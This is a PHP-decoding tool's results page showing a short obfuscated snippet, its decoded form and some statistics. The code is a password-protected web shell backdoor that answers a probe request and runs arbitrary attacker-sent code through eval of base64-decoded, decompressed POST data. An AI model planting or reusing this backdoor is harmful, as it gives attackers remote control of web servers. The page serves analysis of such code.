Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_PO..

Decoded Output download

 <?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"] == \"2dmfrb28nu3c6s9j\") {eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

Did this file decode correctly?

Original Code

 <?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"] == \"2dmfrb28nu3c6s9j\") {eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

Function Calls

None

Variables

None

Stats

MD5 af8fcf60fcadfd65797fd92dbd6e489b
Eval Count 0
Decode Time 85 ms